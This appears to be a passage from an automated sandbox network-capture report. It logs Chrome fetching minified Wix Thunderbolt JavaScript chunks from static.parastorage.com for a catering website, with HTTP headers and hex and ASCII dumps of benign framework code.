                                                                                                                                                                                                                        Content-Length: 21922
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: .N3TxLTttWru.M61phR0MUn3x1JX3pmt
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 636479137 624607284
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 390919002
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcydaHuKmePuYLvGovietlnc/MRAhrlVRxaXdYSRy7tLb
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:26 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274152
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:09 GMT
                                                                                                                                                                                                                        ETag: "1a8945e17f7e3611640eacb74e873849"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC227INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 38 33 39 5d 2c 7b 32 31 32 38 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 54 39 3a 28 29 3d 3e 69 2c 74 37 3a 28 29 3d 3e 6f 2c 77 34 3a 28 29 3d 3e 61 2c 77 42 3a 28 29 3d 3e 63 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 72 62 5f 22 2c 73 3d 22 2e 6c 6f 63 61 6c 22 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[9839],{21280:(e,t,n)=>{n.d(t,{T9:()=>i,t7:()=>o,w4:()=>a,wB:()=>c});const r="rb_",s=".local";function o(e){return e.replace
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 28 73 2c 22 22 29 7d 63 6f 6e 73 74 20 61 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 63 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 3a 74 2c 6f 72 69 67 69 6e 61 6c 43 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 3a 6e 2c 70 61 72 74 3a 73 2c 6e 61 6d 65 73 70 61 63 65 3a 6f 3d 22 22 2c 68 6f 73 74 3a 61 2c 62 61 74 63 68 3a 69 7d 3d 65 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3f 65 21 3d 3d 74 26 26 74 3f 60 24 7b 65 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 74 2c 22 67 22 29 2c 22 7e 22 29 7d 7e 24 7b 74 7d 60 3a 65 3a 6e 75 6c 6c 7d 28 74 2c 6e 29 3b 72 65 74 75 72 6e 20 74 26 26 73 3f 60 24 7b 72 7d 24 7b 6f 7d 2e 24 7b 61 7d 5b 24 7b 63 7d 5d 24 7b 73 7d 60 3a 74 3f 60 24 7b 72 7d 24 7b 6f 7d 2e 24 7b 61 7d 5b 24 7b 63 7d 5d
                                                                                                                                                                                                                        Data Ascii: (s,"")}const a=e=>{const{componentName:t,originalComponentName:n,part:s,namespace:o="",host:a,batch:i}=e,c=function(e,t){return e?e!==t&&t?`${e.replace(new RegExp(t,"g"),"~")}~${t}`:e:null}(t,n);return t&&s?`${r}${o}.${a}[${c}]${s}`:t?`${r}${o}.${a}[${c}]
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 60 6c 69 6e 6b 5b 68 72 65 66 3d 22 24 7b 65 7d 22 5d 60 29 7d 28 65 29 29 29 2e 6d 61 70 28 28 65 3d 3e 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 74 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 3b 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 65 6c 22 2c 22 73 74 79 6c 65 73 68 65 65 74 22 29 2c 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 74 65 78 74 2f 63 73 73 22 29 2c 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 2c 65 29 2c 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22
                                                                                                                                                                                                                        Data Ascii: ocument.querySelector(`link[href="${e}"]`)}(e))).map((e=>function(e){return new Promise(((t,n)=>{const r=document.createElement("link");r.setAttribute("rel","stylesheet"),r.setAttribute("type","text/css"),r.setAttribute("href",e),r.addEventListener("load"
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 29 26 26 28 30 2c 6f 2e 4f 59 29 28 6d 29 3f 28 30 2c 6f 2e 6c 42 29 28 65 2c 66 5b 65 5d 29 3a 28 30 2c 6f 2e 45 31 29 28 65 2c 6e 2c 6d 29 3b 72 65 74 75 72 6e 7b 66 65 74 63 68 3a 61 73 79 6e 63 28 7b 75 72 6c 3a 65 7d 29 3d 3e 72 28 65 29 2c 61 73 79 6e 63 20 66 65 74 63 68 4c 69 62 72 61 72 79 4d 61 6e 69 66 65 73 74 28 7b 75 72 6c 3a 65 7d 29 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 20 72 28 65 29 3b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 7d 2c 63 72 65 61 74 65 42 75 6e 64 6c 65 4c 6f 61 64 65 72 28 7b 65 6e 76 69 72 6f 6e 6d 65 6e 74 3a 65 7d 29 7b 63 6f 6e 73 74 20 74 3d 69 28 29 3b 6c 65 74 20 72 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 61 73 79 6e 63 28 7b 75 72 6c 3a 69 2c 69 64 3a 63 2c 61 73 73 65 74 73 3a 6c 3d 5b 5d 7d
                                                                                                                                                                                                                        Data Ascii: )&&(0,o.OY)(m)?(0,o.lB)(e,f[e]):(0,o.E1)(e,n,m);return{fetch:async({url:e})=>r(e),async fetchLibraryManifest({url:e}){const t=await r(e);return JSON.parse(t)},createBundleLoader({environment:e}){const t=i();let r=null;return async({url:i,id:c,assets:l=[]}
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 29 2c 67 65 74 4e 61 6d 65 73 70 61 63 65 3a 28 29 3d 3e 65 2e 6e 61 6d 65 73 70 61 63 65 2c 67 65 74 42 61 73 65 55 72 6c 3a 28 29 3d 3e 65 2e 62 61 73 65 55 52 4c 2c 67 65 74 53 74 61 74 69 63 73 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 65 2e 73 74 61 74 69 63 73 3f 3f 7b 7d 3b 72 65 74 75 72 6e 7b 2e 2e 2e 65 2e 6c 69 62 72 61 72 79 53 74 61 74 69 63 73 7c 7c 7b 7d 2c 2e 2e 2e 74 3f 6e 5b 74 5d 3a 7b 7d 7d 7d 2c 67 65 74 4c 69 62 72 61 72 79 53 74 61 74 69 63 73 3a 28 29 3d 3e 65 2e 6c 69 62 72 61 72 79 53 74 61 74 69 63 73 3f 3f 7b 7d 2c 67 65 74 48 6f 73 74 42 75 6e 64 6c 65 4d 6f 64 65 6c 3a 28 29 3d 3e 28 7b 6e 61 6d 65 3a 65 2e 68 6f 73 74 2c 69 64 3a 28 30 2c 72 2e 77 34 29 28 7b 6e 61 6d 65 73 70 61 63 65 3a 65 2e 6e 61 6d 65 73 70 61 63 65 2c 68 6f
                                                                                                                                                                                                                        Data Ascii: ),getNamespace:()=>e.namespace,getBaseUrl:()=>e.baseURL,getStatics(t){const n=e.statics??{};return{...e.libraryStatics||{},...t?n[t]:{}}},getLibraryStatics:()=>e.libraryStatics??{},getHostBundleModel:()=>({name:e.host,id:(0,r.w4)({namespace:e.namespace,ho
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 5b 2c 65 5d 29 3d 3e 7b 65 2e 70 61 72 74 73 3f 2e 66 6f 72 45 61 63 68 28 28 28 5b 2c 2e 2e 2e 65 5d 29 3d 3e 7b 65 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 72 5b 65 5d 7c 7c 28 72 5b 65 5d 3d 7b 69 64 3a 6e 75 6c 6c 2c 6e 61 6d 65 3a 65 2c 73 72 63 3a 7b 7d 7d 29 7d 29 29 7d 29 29 7d 29 29 2c 72 7d 7d 7d 76 61 72 20 68 3d 6e 28 34 39 34 36 32 29 3b 66 75 6e 63 74 69 6f 6e 20 79 28 7b 72 65 73 6f 75 72 63 65 3a 65 2c 70 61 72 74 73 3a 74 3d 7b 7d 7d 29 7b 63 6f 6e 73 74 20 6e 3d 5b 5d 2c 72 3d 65 3d 3e 7b 65 3f 2e 73 72 63 26 26 28 65 2e 69 64 26 26 65 2e 73 72 63 2e 6a 73 26 26 6e 2e 70 75 73 68 28 7b 69 64 3a 65 2e 69 64 2c 75 72 6c 3a 65 2e 73 72 63 2e 6a 73 2c 74 79 70 65 3a 22 6d 6f 64 65 6c 22 7d 29 2c 65 2e 73 72 63 2e 63 73 73 26 26 6e 2e 70 75
                                                                                                                                                                                                                        Data Ascii: [,e])=>{e.parts?.forEach((([,...e])=>{e.forEach((e=>{r[e]||(r[e]={id:null,name:e,src:{}})}))}))})),r}}}var h=n(49462);function y({resource:e,parts:t={}}){const n=[],r=e=>{e?.src&&(e.id&&e.src.js&&n.push({id:e.id,url:e.src.js,type:"model"}),e.src.css&&n.pu
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 2c 73 74 61 74 69 63 73 3a 65 2e 67 65 74 53 74 61 74 69 63 73 28 61 29 7d 29 7d 29 29 2c 6f 7d 63 6f 6e 73 74 20 67 3d 22 72 65 67 69 73 74 72 79 22 3b 63 6f 6e 73 74 20 45 3d 6e 65 77 20 52 65 67 45 78 70 28 60 5e 28 28 24 7b 5b 22 68 74 74 70 73 3a 2f 2f 62 6f 2e 77 69 78 2e 63 6f 6d 2f 73 75 72 69 63 61 74 65 2f 74 75 6e 6e 65 6c 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 63 61 6c 68 6f 73 74 3a 22 2c 22 68 74 74 70 3a 2f 2f 6c 6f 63 61 6c 68 6f 73 74 3a 22 2c 22 68 74 74 70 73 3a 2f 2f 73 6c 65 64 2e 77 69 78 2e 64 65 76 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 22 5d 2e 6a 6f 69 6e 28 22 29 7c 28 22 29 7d 29 29 60 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 65 29 7b 72 65 74 75 72 6e 20 45 2e
                                                                                                                                                                                                                        Data Ascii: ,statics:e.getStatics(a)})})),o}const g="registry";const E=new RegExp(`^((${["https://bo.wix.com/suricate/tunnel/","https://localhost:","http://localhost:","https://sled.wix.dev/","https://static.parastorage.com/"].join(")|(")}))`);function w(e){return E.
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 6e 20 20 20 20 20 20 20 20 65 78 65 63 20 3d 20 64 65 70 41 72 67 3b 5c 6e 20 20 20 20 7d 20 65 6c 73 65 20 7b 5c 6e 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 45 72 72 6f 72 28 70 72 6f 63 65 73 73 2e 65 6e 76 2e 53 59 53 54 45 4d 5f 50 52 4f 44 55 43 54 49 4f 4e 20 3f 20 65 72 72 4d 73 67 28 39 29 20 3a 20 65 72 72 4d 73 67 28 39 2c 20 27 49 6e 76 61 6c 69 64 20 63 61 6c 6c 20 74 6f 20 41 4d 44 20 64 65 66 69 6e 65 28 29 27 29 29 3b 5c 6e 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 63 6f 6e 73 74 20 6c 6f 61 64 4d 6f 64 75 6c 65 20 3d 20 61 73 79 6e 63 20 28 6d 6f 64 4e 61 6d 65 29 20 3d 3e 20 7b 5c 6e 20 20 20 20 20 20 63 6f 6e 73 74 20 6d 6f 64 20 3d 20 61 77 61 69 74 20 69 6d 70 6f 72 74 28 6d 6f 64 4e 61 6d 65 29 3b 5c 6e 20 20 20 20 20 20 69 66 20 28 73
                                                                                                                                                                                                                        Data Ascii: n exec = depArg;\n } else {\n throw Error(process.env.SYSTEM_PRODUCTION ? errMsg(9) : errMsg(9, 'Invalid call to AMD define()'));\n }\n\n const loadModule = async (modName) => {\n const mod = await import(modName);\n if (s
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 7b 75 72 6c 3a 6f 2c 69 64 3a 69 2c 61 73 73 65 74 73 3a 63 3d 5b 5d 7d 29 3d 3e 7b 69 66 28 63 26 26 61 77 61 69 74 20 61 28 63 2e 66 69 6c 74 65 72 28 28 65 3d 3e 21 21 65 29 29 29 2c 6f 29 72 65 74 75 72 6e 28 28 7b 75 72 6c 3a 6f 7d 29 3d 3e 74 28 6f 2c 7b 70 65 72 73 69 73 74 65 6e 74 3a 21 73 2e 6f 37 2e 73 6f 6d 65 28 28 65 3d 3e 6f 2e 73 74 61 72 74 73 57 69 74 68 28 65 29 29 29 2c 66 61 63 74 6f 72 79 3a 61 73 79 6e 63 28 29 3d 3e 28 65 26 26 61 77 61 69 74 20 72 28 65 2c 6e 29 2c 6e 28 6f 29 29 7d 29 29 28 7b 75 72 6c 3a 6f 2c 69 64 3a 69 7d 29 7d 7d 7d 7d 63 6c 61 73 73 20 41 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 6e 3d 7b 64 73 6e 3a 22 68 74 74 70 73 3a 2f 2f 66 33 31 62 63 33 64 65 35 66 37 66 34 66 35 32 39 30 33 34 32 64 63 63
                                                                                                                                                                                                                        Data Ascii: {url:o,id:i,assets:c=[]})=>{if(c&&await a(c.filter((e=>!!e))),o)return(({url:o})=>t(o,{persistent:!s.o7.some((e=>o.startsWith(e))),factory:async()=>(e&&await r(e,n),n(o))}))({url:o,id:i})}}}}class A{constructor(e,t,n={dsn:"https://f31bc3de5f7f4f5290342dcc
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 75 73 65 4c 61 7a 79 4c 6f 61 64 65 72 73 49 6e 69 74 3a 21 31 2c 75 73 65 45 73 6d 4c 6f 61 64 65 72 3a 21 31 2c 2e 2e 2e 65 7d 7d 28 61 2e 6f 70 74 69 6f 6e 73 7c 7c 7b 7d 29 2c 6c 3d 75 2e 75 73 65 45 73 6d 4c 6f 61 64 65 72 3f 4c 3a 6d 2c 64 3d 63 2e 73 79 6e 63 28 28 28 29 3d 3e 6c 28 7b 6f 70 74 69 6f 6e 73 3a 75 2c 66 65 74 63 68 65 72 3a 61 2e 66 65 74 63 68 65 72 2c 67 6c 6f 62 61 6c 73 3a 61 2e 67 6c 6f 62 61 6c 73 2c 69 73 45 78 70 65 72 69 6d 65 6e 74 4f 70 65 6e 3a 6e 2c 68 6f 73 74 3a 65 7d 29 29 2c 7b 6d 65 74 68 6f 64 4e 61 6d 65 3a 22 72 65 73 6f 75 72 63 65 4c 6f 61 64 65 72 46 61 63 74 6f 72 79 22 7d 29 2c 7b 6c 69 62 72 61 72 69 65 73 3a 70 2c 72 65 67 69 73 74 72 79 4f 76 65 72 72 69 64 65 4c 69 62 72 61 72 79 3a 45 7d 3d 66 75 6e 63
                                                                                                                                                                                                                        Data Ascii: useLazyLoadersInit:!1,useEsmLoader:!1,...e}}(a.options||{}),l=u.useEsmLoader?L:m,d=c.sync((()=>l({options:u,fetcher:a.fetcher,globals:a.globals,isExperimentOpen:n,host:e})),{methodName:"resourceLoaderFactory"}),{libraries:p,registryOverrideLibrary:E}=func


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        39192.168.2.54975934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC429OUTGET /services/wix-thunderbolt/dist/thunderbolt-components-registry.b89104dd.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1141
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: LKvjPnU0bkkSbtqFu6u8QJgNG3KemjO_
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 290530502 255745150
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 977677272
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:26 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274152
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:12 GMT
                                                                                                                                                                                                                        ETag: "24211dda55c887de6746abce758ff45f"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 35 34 35 5d 2c 7b 38 31 30 39 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 63 72 65 61 74 65 43 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 43 53 52 3a 28 29 3d 3e 70 7d 29 3b 76 61 72 20 6f 3d 6e 28 37 36 39 30 34 29 3b 76 61 72 20 73 3d 6e 28 34 30 39 38 33 29 3b 63 6f 6e 73 74 20 72 3d 28 30 2c 6e 28 38 33 33 38 29 2e 49 71 29 28 7b 68 6f 73 74
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2545],{81095:(e,t,n)=>{n.d(t,{createComponentsRegistryCSR:()=>p});var o=n(76904);var s=n(40983);const r=(0,n(8338).Iq)({host
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC913INData Raw: 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 7d 29 3b 76 61 72 20 69 3d 6e 28 35 36 39 30 30 29 3b 63 6f 6e 73 74 20 61 3d 28 30 2c 73 2e 4b 29 28 7b 68 6f 73 74 3a 22 76 69 65 77 65 72 22 7d 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 70 28 7b 72 75 6e 41 6e 64 52 65 70 6f 72 74 3a 65 7d 29 7b 77 69 6e 64 6f 77 2e 63 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 26 26 61 77 61 69 74 20 77 69 6e 64 6f 77 2e 63 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 2e 72 75 6e 74 69 6d 65 52 65 61 64 79 3b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2e 63 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 3f 2e 72 75 6e 74 69 6d 65 2c 6e 3d 77 69 6e 64 6f 77 2e 76 69 65 77 65 72 4d 6f 64 65 6c 2e 63 6f 6d 70 6f 6e 65 6e 74 73 4c 69 62 72 61 72 69 65 73
                                                                                                                                                                                                                        Data Ascii: :"thunderbolt"});var i=n(56900);const a=(0,s.K)({host:"viewer"});async function p({runAndReport:e}){window.componentsRegistry&&await window.componentsRegistry.runtimeReady;const t=window.componentsRegistry?.runtime,n=window.viewerModel.componentsLibraries


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        40192.168.2.54976034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC627OUTGET /services/wix-thunderbolt/dist/renderer.1e49a6e4.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1113INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 5111
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: t40Y4T5khEhTsxg9FnKbgi.KhIeqcuyJ
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 271379579 261514085
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274151
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:11 GMT
                                                                                                                                                                                                                        ETag: "738969bb5b17d7c858e9c99e9a4d1d3f"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC277INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 39 37 30 5d 2c 7b 36 35 32 38 32 3a 28 74 2c 69 2c 6f 29 3d 3e 7b 6f 2e 64 28 69 2c 7b 45 57 3a 28 29 3d 3e 53 2c 48 4e 3a 28 29 3d 3e 64 2c 51 5a 3a 28 29 3d 3e 4f 2c 76 50 3a 28 29 3d 3e 70 7d 29 3b 76 61 72 20 72 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 70 72 65 61 63 74 2d 73 69 67 6e 61 6c 73 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 69 66 28 66 3e 31 29 66 2d 2d 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 74 2c 69 3d 21 31 3b 76 6f 69 64
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2970],{65282:(t,i,o)=>{o.d(i,{EW:()=>S,HN:()=>d,QZ:()=>O,vP:()=>p});var r=Symbol.for("preact-signals");function n(){if(f>1)f--;else{for(var t,i=!1;void
